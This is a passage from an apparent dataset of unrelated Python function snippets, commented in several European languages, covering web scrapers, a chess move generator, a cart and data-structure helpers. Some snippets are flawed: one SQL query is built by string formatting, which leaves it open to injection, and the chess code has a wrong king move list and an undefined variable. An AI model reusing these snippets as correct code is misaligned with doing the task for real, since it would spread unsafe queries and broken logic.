list_aeport=[]):\n soup = BeautifulSoup(self.getContent(url_direct.get('dash-aero')))\n aeport = None\n for aeport in list_aeport:\n aeport_status = soup.find('td', text=aeport.get('local'))\n if aeport_status:\n _aeport_status = aeport_status.parent.findAll('span')\n aeport['atrasados'] = str(_aeport_status[0].text)\n aeport['cancelados'] = str(_aeport_status[8].text)\n else:\n aeport['atrasados'] = None\n aeport['cancelados'] = None\n return list_aeport", "def agregar_bolsa(self, letra, cantidad):", "def get_komponentu(self, naziv):\n return self.komponente[naziv]", "def listar_gabarito():\n return GabaritoProva.listar(gabarito)", "def cliquer_sur_unité(self):", "def scrape_cartelera(data, comp_nom):\t\n\tfunciones = []\n\t#limpia el html para no tener problemas:\n\tcleaner = Cleaner(page_structure=False)\n\tcleaned = cleaner.clean_html(data)\n\tsoup = BeautifulSoup(cleaned, convertEntities=BeautifulStoneSoup.HTML_ENTITIES)\n\tshow_exp = re.compile(r'sid=(\\d+)')\n\tsala_exp = re.compile(r'Sala (\\d{1,2})')\n\t\n\tcomplejo_org = Complejo.objects.get(nombre=comp_nom)\n\tcomplejo = complejo_org\n\tcomplejo_platino = None\n\t\n\t#Quita el nombre cinemex para encontrar comp platino\n\tnom_corto = comp_nom.replace('Cinemex ', '')\n\tcomplejos_l = Complejo.objects.filter(nombre__icontains=nom_corto, cadena='Cinemex')\n\t#Busca complejo platino:\n\tif len(complejos_l) > 1:\n\t\tnom = 'Cinemex Platino '+ nom_corto\n\t\tquery = complejos_l.filter(nombre=nom)\n\t\tif len(query): complejo_platino = query[0] \n\t\t\n\tpeliculas = []\n\tcontenido = soup.find('div', 'contenido2')\n\t\n\t#Si existe tabla de peliculas\n\tif contenido:\n\t\ttry:\n\t\t\tpeliculas = contenido.find('table', cellspacing='0', cellpadding='0', border='0').contents\n\t\texcept:\n\t\t\tlogger.debug( u'Error cargando complejo %s' %comp_nom)\n\t\t\treturn []\n\t\t\t#logger.debug( u'peliculas mide %s' %len(peliculas))\n\t\t\n\t\t\n\t\tfor peli in peliculas:\n\t\t\t#logger.debug( peli)\n\t\t\t#Asegura que no sea un navigableString\n\t\t\timax = False\n\t\t\tif type(peli) != NavigableString:\n\t\t\t\tif peli.find('div', 'texto_1', align='center'):\n\t\t\t\t\t#logger.debug( peli.b.string)\n\t\t\t\t\tif peli.b.string.find('Platino') > -1:\n\t\t\t\t\t\t#Ajustar el complejo para platino\n\t\t\t\t\t\tif complejo_platino:\n\t\t\t\t\t\t\timax = False\n\t\t\t\t\t\t\tcomplejo = complejo_platino\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tlogger.debug( u'Me falta platino %s' %comp_nom)\n\t\t\t\t\t\t\treturn funciones\n\t\t\t\t\t\t#logger.debug( 'Estoy en platino')\n\t\t\t\t\telif peli.b.string.find('IMAX')>-1:\n\t\t\t\t\t\timax = True\n\t\t\t\t\telse:\n\t\t\t\t\t\timax = False\n\t\t\t\t\t\tcomplejo= complejo_org\n\t\t\t\t\t\t\n\t\t\t\t#Si el td corresponde a una pelicula\n\t\t\t\tif peli.find('td', width='210', valign='top'):\t\n\t\t\t\t\ttres_D = False\n\t\t\t\t\tidioma = None\n\t\t\t\t\tsala = None\n\t\t\t\t\tpelicula = None\n\t\t\t\t\t\n\t\t\t\t\t#Checar tiene logo de 3d\n\t\t\t\t\tif peli.find('div', 'icono_platino').find('img', src=re.compile(r'3d.png$')): tres_D = True\n\t\t\t\t\t\n\t\t\t\t\t#Encabezado contiene titulo e idioma\n\t\t\t\t\tencabezado = peli.find('li', 'texto_3')\n\t\t\t\t\ttitulo = ''.join(encabezado.findAll(text=True)).replace('\\n', '').strip()\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t#Determina Idioma\n\t\t\t\t\tidi = encabezado.find('img', alt='idioma')\n\t\t\t\t\tif idi:\n\t\t\t\t\t\tif idi.get('src', '').find('ing') > 0:\n\t\t\t\t\t\t\tidioma = 'ingles'\n\t\t\t\t\telse:\n\t\t\t\t\t\tidioma = 'espanol'\n\t\t\t\t\t\t\n\t\t\t\t\t#Buscar pelicula por titulo segun idioma y 3d.. subtitulada o no.\n\t\t\t\t\t#logger.debug( u'titulo %s' %titulo)\n\t\t\t\t\ttit = '|'+ titulo + '|'\n\t\t\t\t\tpeli_query = filter_peli_ver(pelicula__alt_tit__icontains=tit, tres_D=tres_D, imax=imax)# id_mex__gt=0)\n\t\t\t\t\t#Checa si hay imax. \n\t\t\t\t\tlas_imax = peli_query.filter(imax=True)\n\t\t\t\t\tif las_imax:\n\t\t\t\t\t\tpeli_query= las_imax\n\t\t\t\t\t\tlogger.debug( 'Encontre imax!')\n\t\t\t\t\t\t\n\t\t\t\t\tif len(peli_query) > 1:\n\t\t\t\t\t\t#Si idioma == ingles, selecciona la pelicula subtitulada\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tpelicula = peli_query.get(subtitulada= (idioma == 'ingles'), doblada = (idioma != 'ingles') )\n\t\t\t\t\t\t\t\n\t\t\t\t\t\texcept Exception, e:\n\t\t\t\t\t\t\tlogger.debug( e)\n\t\t\t\t\t\t\tlogger.debug( \"Error de idioma con la pelicula %s, idioma: %s\" % (titulo, idioma))\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\telif len(peli_query) == 1:\n\t\t\t\t\t\tpelicula = peli_query[0]\n\t\t\t\t\telse:\n\t\t\t\t\t\tlogger.debug( u'No encontre pelicula %s, tres_D=%s, idioma=%s' %(titulo, tres_D, idioma))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t#logger.debug( u'pelicula %s' %pelicula)\n\t\t\t\t\thoras_html = peli.findAll('div', id='fecha')\n\t\t\t\t\t\n\t\t\t\t\t#logger.debug( u'tengo %s fechas aqui...' %len(horas_html))\n\t\t\t\t\t#logger.debug( horas_html)\n\t\t\t\t\t\n\t\t\t\t\tfor tag in horas_html:\n\t\t\t\t\t\t#Me salto todo lo que no es html\n\t\t\t\t\t\tif type(tag) != NavigableString:\n\t\t\t\t\t\t\t#Si esta disponible, obtiene num. sala\n\t\t\t\t\t\t\tif tag.get('style', '').find('text-transform: uppercase;') > -1: sala = sala_exp.search(tag.string).group(1)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t#logger.debug( u'hay %s horarios aqui'%len(tag.findNext('div', id='horarios').findAll('a', 'texto_1')))\n\t\t\t\t\t\t\tfecha = parseDate(tag.string)\n\t\t\t\t\t\t\t#logger.debug( pelicula)\n\t\t\t\t\t\t\t#logger.debug( complejo)\n\t\t\t\t\t\t\tfunciones.extend([{\n \t\t\t\t\t\t\t\t\t'peli_ver': pelicula,\n \t\t\t\t\t\t\t\t\t'complejo': complejo,\n \t\t\t\t\t\t\t\t\t'hora': datetime.datetime(fecha.year, fecha.month, fecha.day, *time.strptime( hora_html.string , '%H:%M')[3:5]),\n \t\t\t\t\t\t\t\t\t'pol_idShowTime': show_exp.search(hora_html['href']).group(1),\n \t\t\t\t\t\t\t\t\t'sala': sala,\n \t\t\t\t\t\t\t\t\t} for hora_html in tag.findNext('div', id='horarios').findAll('a', 'texto_1')])\n\t\t#logger.debug( len(funciones))\n\t\treturn funciones", "def getAbono(self, cod):\n return self.conexion.ejecutarSQL(\"\"\"select id, fecha, hora, valor, id_venta, usuario_colaborador, id_tipoPago\n from abonos\n where id = %s\"\"\"%(cod))", "def ottieni_ultimi(astaid, Oggetto, numero=0):\n queryS = Oggetto.objects.filter(asta__id=astaid).order_by('-id')\n if(int(numero)==0):\n ultimi = queryS.all()\n else:\n ultimi = queryS[:numero]\n return ultimi", "def __init__(self):\n self.nombre_roues = 4\n self.nombre_fauteils = 1\n self.moteur = False\n self.volant = True", "def get_mvts(self, plateau):\n if self.type == \"p\": #Pion\n if self.color == \"w\":\n diags = [[self.x-1, self.y+1],[self.x+1, self.y+1]] #Mouvements possibles de diagonales\n faces = [[self.x, self.y+1]] #Mouvements possibles de face\n if not self.moved: #Si le pion n'a pas encore bougé de la partie\n faces.append([self.x, self.y+2])\n else:\n diags = [[self.x-1, self.y-1], [self.x+1, self.y-1]]\n faces = [[self.x, self.y-1]] #Mouvements possibles de \n if not self.moved:\n faces.append([self.x, self.y-2])\n pos = [] #Position de déplacement validées\n for d in diags:\n if verif_case(d[0], d[1]): #Si la case est sur le plateau \n pion = plateau.get_pion(d[0],d[1])\n if pion != None and pion.color != self.color: #Si il y a un pion ennemi\n pos.append(d)\n for f in faces: \n if verif_case(f[0],f[1]):\n pion = plateau.get_pion(f[0], f[1])\n if pion == None: #Si il n'y a pas de pion\n pos.append(f)\n return pos\n elif self.type == \"t\": #Tour\n pos = []\n dir = [[1,0],[-1,0],[0,1],[0,-1]] #4 directions possibles\n for d in dir:\n x,y = self.x+d[0],self.y+d[1] #Projection de position\n while verif_case(x,y): #Tant que (x, y) est sur le plateau\n pion = plateau.get_pion(x, y)\n if pion != None: #Si il y a un pion\n if pion.color != self.color: #Si il n'est pas allié\n pos.append([x,y])\n break\n pos.append([x,y])\n x += d[0]\n y += d[1]\n return pos\n elif self.type == \"c\": #Cavalier\n l = [-2,-1,1,2]\n mvts = [[x,y] for x in l for y in l if abs(x)!=abs(y)]\n pos = []\n for m in mvts:\n x = self.x + m[0]\n y = self.y + m[1]\n if verif_case(x,y):\n pion = plateau.get_pion(x, y)\n if pion == None or pion.color != self.color:\n pos.append([x, y])\n return pos\n elif self.type == \"f\": #Fou\n dir = [[1,1],[-1,1],[-1,-1],[1,-1]]\n pos = []\n for d in dir:\n x,y = self.x+d[0],self.y+d[1]\n while verif_case(x,y):\n pion = plateau.get_pion(x, y)\n if pion != None:\n if pion.color != self.color:\n pos.append([x,y])\n break\n pos.append([x,y])\n x += d[0]\n y += d[1]\n return pos\n elif self.type == \"k\": #Roi\n mvts = [[1,0],[-1,1],[0,-1],[-1,-1],[-1,0],[-1,1],[0,1],[1,1]] #4 mouvements possibles\n pos = []\n for m in mvts:\n x = self.x + m[0]\n y = self.y + m[1]\n if verif_case(x, y):\n pion = plateau.get_pion(x, y)\n if pion == None or pion.color != self.color:\n pos.append([self.x + m[0], self.y + m[1]])\n return pos\n elif self.type == \"q\": #Dame\n pos = []\n dir = [[1,0],[1,-1],[0,-1],[-1,-1],[-1,0],[-1,1],[0,1],[1,1]]\n for d in dir:\n x,y = self.x+d[0],self.y+d[1]\n while verif_case(x,y):\n pion = plateau.get_pion(x, y)\n if pion != None:\n if pion.color != joueur:\n pos.append([x,y])\n break\n pos.append([x,y])\n x += d[0]\n y += d[1]\n return pos", "def first(self):", "def obtenerPelicula(nombre=None):\n pelicula = Pelicula(None, nombre)\n\n return pelicula", "def eksport(lista):\n # wynik - lista zawierajaca wynik koncowy dzialania funkcji(lata i wartosci dla poszczegolnych panstw)\n wynik = []\n for panstwo in lista:\n # rok - lista zawierajaca lata\n # wartosc - lista zawierajaca wartosci dla lat\n rok = []\n wartosc = []\n for element in panstwo:\n # sprawdzenie czy klucz posiada odpowiednia wartosc\n if element[1].get('key') == \"NE.EXP.GNFS.CD\":\n # dodanie roku do listy\n rok.append(int(element[2].text))\n # rozpatrywanie przypadku w ktorym wartosc jest None\n if element[3].text is None:\n wartosc.append(element[3].text)\n else:\n wartosc.append(float(element[3].text))\n # dodawanie list dla poszczegolnych panstw do listy wynikowej\n wynik.append(rok)\n wynik.append(wartosc)\n\n return wynik", "def Cel(categorie, pagini, cautare=\"normala\"):\n log = Logger()\n debug = Verificare_Debug()\n if cautare == \"normala\":\n categorie = html_part_link[categorie]\n s = Scrapper(jsonfn, categorie, None)\n elif cautare == \"personalizata\":\n s = Scrapper(jsonfn, categorie, None, cautare=\"personalizata\")\n html = s.get_html_code(s.link)\n log.scriere(\"Preiau date de pe {}.\".format(s.link))\n\n # Preiau numarul maxim de pagini\n pagini_max = 0\n for el in html.select(s.jsondata[\"pagini\"][\"tag\"]):\n try:\n if el[s.jsondata[\"pagini\"][\"tip\"]] == s.jsondata[\"pagini\"][\"termen\"]:\n for e in el.select(s.jsondata[\"pagini\"][\"tag2\"]):\n try:\n if pagini_max < int(e.text):\n pagini_max = int(e.text)\n except:\n pass\n except:\n pass\n\n # Setez numarul de pagini de pe care se vor prelua produse, comparand datele introduse de utilizator cu numarul\n # maxim de pagini admis de cautare\n if pagini == None:\n pagini = 10\n if pagini > pagini_max:\n pagini = pagini_max\n\n # Pentru fiecare pagina in parte\n hrefs = []\n for i in range(1, pagini+1):\n if cautare == \"normala\":\n html = s.get_html_code(s.jsondata[\"link_pagina\"].format(categorie, i))\n elif cautare == \"personalizata\":\n html = s.get_html_code(s.jsondata[\"link_personalizat_pagina\"].format(categorie, i))\n # Preiau lista produselor\n container = \"\"\n for el in html.select(s.jsondata[\"box\"][\"tag\"]):\n try:\n if el[s.jsondata[\"box\"][\"tip\"]] == s.jsondata[\"box\"][\"termen\"]:\n container = el\n break\n except:\n pass\n\n # Preiau produsele\n prod = []\n for el in container.select(s.jsondata[\"produs\"][\"tag\"]):\n try:\n if el[s.jsondata[\"produs\"][\"tip\"]] == s.jsondata[\"produs\"][\"termen\"]:\n # Verific daca produsul este la reducere\n for e in el.select(s.jsondata[\"produs\"][\"promo\"][\"tag\"]):\n try:\n if e[s.jsondata[\"produs\"][\"promo\"][\"tip\"]] == s.jsondata[\"produs\"][\"promo\"][\"termen\"]:\n prod.append(el)\n break\n except:\n pass\n except:\n pass\n\n # Preiau link-ul spre produs\n for p in prod:\n for el in p.select(s.jsondata[\"href\"][\"tag\"]):\n try:\n if el[s.jsondata[\"href\"][\"tip\"]] == s.jsondata[\"href\"][\"termen\"]:\n hrefs.append(el[s.jsondata[\"href\"][\"arg\"]])\n break\n except:\n pass\n\n # Preiau informatiile fiecarui produs\n for href in hrefs:\n log.scriere(\"Preiau informatiile de pe {}.\".format(href))\n if debug == True:\n Debug(href, 0)\n info = {}\n html = s.get_html_code(href)\n\n # Preiau titlul produsului\n for el in html.select(s.jsondata[\"data\"][\"titlu\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"titlu\"][\"tip\"]] == s.jsondata[\"data\"][\"titlu\"][\"termen\"]:\n info[\"titlu\"] = el.text\n break\n except:\n pass\n\n # Preiau noul pret, vechiul pret si discount-ul produsului\n _ = {}\n for el in html.select(s.jsondata[\"data\"][\"pret\"][\"nou\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"pret\"][\"nou\"][\"tip\"]] == s.jsondata[\"data\"][\"pret\"][\"nou\"][\"termen\"]:\n _[\"nou\"] = el.text + \" Lei\"\n break\n except:\n pass\n for el in html.select(s.jsondata[\"data\"][\"pret\"][\"vechi\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"pret\"][\"vechi\"][\"tip\"]] == s.jsondata[\"data\"][\"pret\"][\"vechi\"][\"termen\"]:\n __ = el.text.split(\"|\")[-1].split(\" \")\n _[\"vechi\"] = __[-2] + \" \" + __[-1].capitalize()\n __ = el.text.split(\"|\")[0].split(\" \")\n _[\"discount\"] = __[-3] + \" \" + __[-2].capitalize()\n except:\n pass\n info[\"pret\"] = _\n\n # Preiau rating-ul produsului (Daca exista. Daca nu, se initializeaza cu 0 automat)\n _ = {}\n ok = 0\n for el in html.select(s.jsondata[\"data\"][\"rating\"][\"rata\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"rating\"][\"rata\"][\"tip\"]] == s.jsondata[\"data\"][\"rating\"][\"rata\"][\"termen\"]:\n _[\"rata\"] = el.text\n ok = 1\n break\n except:\n pass\n for el in html.select(s.jsondata[\"data\"][\"rating\"][\"review-uri\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"rating\"][\"review-uri\"][\"tip\"]] == s.jsondata[\"data\"][\"rating\"][\"review-uri\"][\"termen\"]:\n _[\"review-uri\"] = el.text\n break\n except:\n pass\n if ok == 1:\n info[\"rating\"] = _\n elif ok == 0:\n info[\"rating\"] = {\"rata\":\"0\", \"review-uri\":\"0\"}\n\n # Preiau descrierea produsului\n _ = \"\"\n for el in html.select(s.jsondata[\"data\"][\"descriere\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"descriere\"][\"tip\"]] == s.jsondata[\"data\"][\"descriere\"][\"termen\"]:\n _ = cel_string.formare_descriere(el.text)\n break\n except:\n pass\n if _ != \"\" and _ != []:\n info[\"descriere\"] = _\n else:\n info[\"descriere\"] = ['']\n\n # Preiau specificatiile produsului\n _ = {}\n for el in html.select(s.jsondata[\"data\"][\"specs\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"specs\"][\"tip\"]] == s.jsondata[\"data\"][\"specs\"][\"termen\"]:\n title = \"\"\n __ = {}\n for e in el.select(s.jsondata[\"data\"][\"specs\"][\"elem\"][\"tag\"]):\n try:\n if len(e[s.jsondata[\"data\"][\"specs\"][\"elem\"][\"tip\"]]) > 0:\n e2 = e.select(s.jsondata[\"data\"][\"specs\"][\"elem\"][\"spec\"][\"tag\"])\n __[e2[0].text] = e2[1].text\n except:\n if title == \"\":\n title = e.text\n if len(__.keys()) > 0:\n _[title] = __\n __ = {}\n title = e.text\n if title != '':\n _[title] = __\n else:\n _[\"Specs\"] = __\n except:\n pass\n info[\"specs\"] = cel_string.formare_specificatii(_)\n\n # Verific daca exista cadou si, daca da, preiau informatiile\n _ = {}\n gift = 0\n for el in html.select(s.jsondata[\"data\"][\"cadou\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"cadou\"][\"tip\"]] == s.jsondata[\"data\"][\"cadou\"][\"termen\"]:\n if debug == True:\n Debug(\"Gift gasit!\", 0)\n gift = 1\n t = ''\n for e in el.select(s.jsondata[\"data\"][\"cadou\"][\"titlu\"][\"tag\"]):\n try:\n if e[s.jsondata[\"data\"][\"cadou\"][\"titlu\"][\"tip\"]] == s.jsondata[\"data\"][\"cadou\"][\"titlu\"][\"termen\"]:\n t = e.text\n break\n except:\n pass\n if t != '' :\n _[\"titlu\"] = t\n for e in el.select(s.jsondata[\"data\"][\"cadou\"][\"pret\"][\"tag\"]):\n try:\n if e[s.jsondata[\"data\"][\"cadou\"][\"pret\"][\"tip\"]] == s.jsondata[\"data\"][\"cadou\"][\"pret\"][\"termen\"]:\n _[\"pret\"] = e.text\n break\n except:\n pass\n else:\n # Cadou fara pret, difera class-ul\n for e in el.select(s.jsondata[\"data\"][\"cadou\"][\"titlu_farapret\"][\"tag\"]):\n try:\n if e[s.jsondata[\"data\"][\"cadou\"][\"titlu_farapret\"][\"tip\"]] == s.jsondata[\"data\"][\"cadou\"][\"titlu_farapret\"][\"termen\"]:\n _[\"titlu\"] = e.text\n except:\n pass\n _[\"pret\"] = \"-\"\n __ = el.select(s.jsondata[\"data\"][\"cadou\"][\"link\"][\"tag\"])\n _[\"link\"] = __[0][s.jsondata[\"data\"][\"cadou\"][\"link\"][\"arg\"]]\n gift_html = s.get_html_code(_[\"link\"])\n for e in gift_html.select(s.jsondata[\"data\"][\"cadou\"][\"imagine\"][\"tag\"]):\n try:\n if e[s.jsondata[\"data\"][\"cadou\"][\"imagine\"][\"tip\"]] == s.jsondata[\"data\"][\"cadou\"][\"imagine\"][\"termen\"]:\n for e2 in e.select(s.jsondata[\"data\"][\"cadou\"][\"imagine\"][\"tag2\"]):\n try:\n _[\"imagine_link\"] = cel_string.link_cadou_imagine(e2[s.jsondata[\"data\"][\"cadou\"][\"imagine\"][\"arg\"]])\n break\n except:\n pass\n break\n except:\n pass\n break\n except:\n pass\n if gift == 1:\n info[\"cadou\"] = _\n\n # Salvez link-ul spre produs\n info[\"link\"] = href\n\n # Preiau imaginile produsului\n imgs = []\n c = \"\"\n for el in html.select(s.jsondata[\"data\"][\"imagini\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"imagini\"][\"tip\"]] == s.jsondata[\"data\"][\"imagini\"][\"termen\"]:\n c = el\n break\n except:\n pass\n sec_link = \"\"\n try:\n for el in c.select(s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"link\"][\"tag\"]):\n try:\n sec_link = el[s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"link\"][\"arg\"]]\n break\n except:\n pass\n except:\n pass\n if sec_link != href and sec_link != '':\n sec_html = s.get_html_code(sec_link)\n for el in sec_html.select(s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"tip\"]] == s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"termen\"]:\n for e in el.select(s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"img_tag\"]):\n try:\n imgs.append(e[s.jsondata[\"data\"][\"imagini\"][\"secundare\"][\"arg\"]])\n except:\n pass\n except:\n pass\n elif sec_link == href and sec_link != '':\n # Inseamna ca exista doar o poza, cea principala\n for el in html.select(s.jsondata[\"data\"][\"imagini\"][\"tag\"]):\n try:\n if el[s.jsondata[\"data\"][\"imagini\"][\"tip\"]] == s.jsondata[\"data\"][\"imagini\"][\"termen\"]:\n for e in el.select(s.jsondata[\"data\"][\"imagini\"][\"img_tag\"]):\n imgs.append(e[s.jsondata[\"data\"][\"imagini\"][\"arg\"]])\n break\n except:\n pass\n # Descarc imaginile\n try:\n _ = info[\"titlu\"].split(\" \")\n except:\n _ = \"\"\n imgname = \"\"\n try:\n for i in range(0, 10):\n imgname = imgname + _[i] + \" \"\n except:\n pass\n imgname = imgname + \"- \"\n IMGS = []\n log.scriere(\"Descarc {} imagini.\".format(len(imgs)))\n for i in range(0, len(imgs)):\n try:\n utils.download_imagine(imgs[i], imgname + str(i))\n if utils.verificare_prezenta_imagine(imgname + str(i)) == True:\n IMGS.append(imgname + str(i) + \".{}\".format(imgs[i].split(\"/\")[-1].split(\".\")[-1]))\n except:\n if debug == True:\n Debug(\"Eroare download {}\".format(str(imgs[i])), 2)\n info[\"imagini\"] = IMGS\n\n # Verific daca exista cadou si, daca da, downloadez imaginea cadoului\n if \"cadou\" in info.keys():\n try:\n utils.download_imagine(info[\"cadou\"][\"imagine_link\"], imgname + \"CADOU\")\n info[\"cadou\"][\"imagine\"] = imgname + \"CADOU\" + \".{}\".format(info[\"cadou\"][\"imagine_link\"].split(\"/\")[-1].split(\".\")[-1])\n except:\n pass\n\n # Verific daca exista toate datele si, daca da, creez fisierul HTML\n if debug == True:\n Debug(str(info.keys()), 0)\n Debug(str(info[\"pret\"].keys()), 0)\n Debug(str(info[\"rating\"].keys()), 0)\n try:\n Debug(str(info[\"cadou\"].keys()), 0)\n except:\n pass\n kw = {\"titlu\": None, \"pret\": [\"vechi\", \"nou\", \"discount\"], \"rating\": [\"rata\", \"review-uri\"], \"descriere\": None,\n \"specs\": None, \"imagini\": None, \"link\": None}\n kw_gift = {\"titlu\": None, \"pret\": [\"vechi\", \"nou\", \"discount\"], \"rating\": [\"rata\", \"review-uri\"],\n \"descriere\": None, \"specs\": None, \"imagini\": None, \"link\": None,\n \"cadou\": [\"titlu\", \"pret\", \"link\", \"imagine\", \"imagine_link\"]}\n if \"cadou\" in info.keys():\n if utils.verificare_date(info, kw_gift) == False:\n # Daca nu sunt toate datele necesare, sterg pozele descarcate\n if debug == True:\n Debug(\"Date insuficente!\", 2)\n utils.stergere_set_imagini(imgname)\n else:\n log.scriere(\"Salvez fisierul HTML.\")\n creatorHTML_gift(info)\n d = db.Database(\"cel\")\n d.initializare_conexiune()\n x = d.cautare_date_link(info[\"link\"])\n if len(x) == 0:\n _ = d.cautare_ultima_data(info[\"link\"])\n if _ == 0:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n else:\n if db.comparare_data_actuala_cu_ultima(_) == 1:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n d.inchidere_conexiune()\n else:\n regasit = db.alegere_pretul_minim(x)\n if regasit[\"pret\"] < cel_string.transformare_pret_int(info[\"pret\"][\"nou\"]):\n if debug == True:\n Debug(\"Produsul a fost regasit!\", 0)\n HTML_adaugare_regasire(info[\"titlu\"], regasit[\"data\"], regasit[\"pret\"])\n _ = d.cautare_ultima_data(info[\"link\"])\n if _ == 0:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n else:\n if db.comparare_data_actuala_cu_ultima(_) == 1:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n d.inchidere_conexiune()\n\n\n else:\n if utils.verificare_date(info, kw) == False:\n # Daca nu sunt toate datele necesare, sterg pozele descarcate\n if debug == True:\n Debug(\"Date insuficiente\", 2)\n utils.stergere_set_imagini(imgname)\n else:\n log.scriere(\"Salvez fisierul HTML.\")\n creatorHTML(info)\n d = db.Database(\"cel\")\n d.initializare_conexiune()\n x = d.cautare_date_link(info[\"link\"])\n if len(x) == 0:\n _ = d.cautare_ultima_data(info[\"link\"])\n if _ == 0:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n else:\n if db.comparare_data_actuala_cu_ultima(_) == 1:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n d.inchidere_conexiune()\n else:\n regasit = db.alegere_pretul_minim(x)\n if regasit[\"pret\"] < cel_string.transformare_pret_int(info[\"pret\"][\"nou\"]):\n if debug == True:\n Debug(\"Produsul a fost regasit!\", 0)\n HTML_adaugare_regasire(info[\"titlu\"], regasit[\"data\"], regasit[\"pret\"])\n _ = d.cautare_ultima_data(info[\"link\"])\n if _ == 0:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n else:\n if db.comparare_data_actuala_cu_ultima(_) == 1:\n d.adaugare_date_2({\"link\": info[\"link\"], \"pret\": cel_string.transformare_pret_int(info[\"pret\"][\"nou\"])})\n d.inchidere_conexiune()", "def __iter__(self):\n ids_productos = self.carro.keys()\n #obtiene los objetos producto y los agrega al carro\n productos = Producto.objects.filter(id__in=ids_productos)\n for producto in productos:\n self.carro[str(producto.id)]['producto'] = producto\n\n for item in self.carro.values():\n item['precio']=Decimal(item['precio'])\n item['precio_total'] = item['precio']*item['cantidad']\n yield item", "def busca(self, k):\n x = self.getRaiz()\n while x is not None and k != x.getChave():\n if k < x.getChave():\n x = x.getEsquerdo()\n else:\n x = x.getDireito()\n return x", "def representarArbolAutomatico(self):\n if not self.stepByStep:\n print(\"Pintar paredes en auto\")\n # Reinicio la matrix\n self.reiniciarMatrix()\n if self.arbol.raiz != None:\n # Capturo todos los valores\n for i in self.arbol.returnArbolComoVector():\n \n # Esta variable captura si se debe de pintar en x o y\n xy = int(i[1])\n cordenadas = i[0]\n print(\"===========NODOS DEL ARBOL=============\")\n print(i)\n print(\"===========NODOS DEL ARBOL=============\")\n # Se pinta en x o y?\n if xy == 0:\n self.crearParedX(int(cordenadas[0]), int(cordenadas[1]))\n else:\n self.crearParedY(int(cordenadas[0]), int(cordenadas[1]))\n\n self.esperarUnRato()\n\n print(\"========LISTO PARA PINTAR EL SIGUIENTE================\")\n \n else:\n print(\"Arbol vacio\")", "def Item(self) -> object:", "def Item(self) -> object:", "def algoritmo(posicionInicial):\n\tglobal vertices, lados\n\n\t# Inicio el algoritmo QuickHull y almacenare el resultado en vertices\n\tconvex = quickHull.QuickHull(posicionInicial)\n\tvertices = convex.quickHull(verticesObjeto)\n\tprint(\"\\nVertices en la envolvente convexa:\\n\")\n\tfor vertex in (vertices):\n\t\tprint(vertex)\n\n\t# creo la lista de lados a partir del los vertices de la envolvente\n\tlados = creaLados(vertices)\n\n\t# creo la maya y el objeto\n\tmi_mesh = bpy.data.meshes.new(nombre)\n\tmi_objeto = bpy.data.objects.new(nombre, mi_mesh)\n\n\t# coloco el objeto en la misma posicion en la que estaba el objeto\n\t# anteriormente seleccionado.\n\tmi_objeto.location = posicionInicial\n\n\t# enlazo el objeto a la escena\n\tbpy.context.scene.objects.link(mi_objeto)\n\n\t# creo el la maya del objeto\n\tmi_mesh.from_pydata(vertices,lados,caras)\n\tmi_mesh.update(calc_edges=True)", "def atender(self):\n\n if self.enfila>0: #Para que atiendan solamente si e que hay alguien en la fila\n\n self.enfila-=1\n self.fila.pop(0) #Saco primer elemento de la fila (Atienden al primer cliente)", "def creaLE(venta): #Esta sección fue hecha por Ángel\n listaPGA = [] # Esto genera la lista necesaria para pasarlo al archivo\n for elemento in venta:\n listaN = elemento[0] + \",\"\n listaN += str(elemento[1]) + \"\\n\"\n listaPGA.append(listaN)\n return listaPGA", "def apilar(pila, dato):\n pila.cima += 1\n pila.datos[pila.cima] = dato", "def ponto_medio(self, alvo):\r\n mx = (self.x + alvo.x)/2\r\n my = (self.y + alvo.y)/2\r\n return Ponto1(mx, my)", "def cellules(self): # itérateur rendu safe\n cellule_courante = self.tete\n while cellule_courante is not None:\n cellule_suivante = cellule_courante.suivant # sauvegarde\n yield cellule_courante\n cellule_courante = cellule_suivante # récupération de la sauvegarde", "def __getitem__(self, item):\n return self.elements[item]", "def pintarIMAGENENMAPA(self, pos):\n # Agrego al vector que controla las images\n k = (pos[0], pos[1], \"img\"+str(self.idIMG))\n # Si deseo pintar una silla\n if self.queIMGAgregar == 1:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgSilla, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar una mesa\n if self.queIMGAgregar == 2:\n 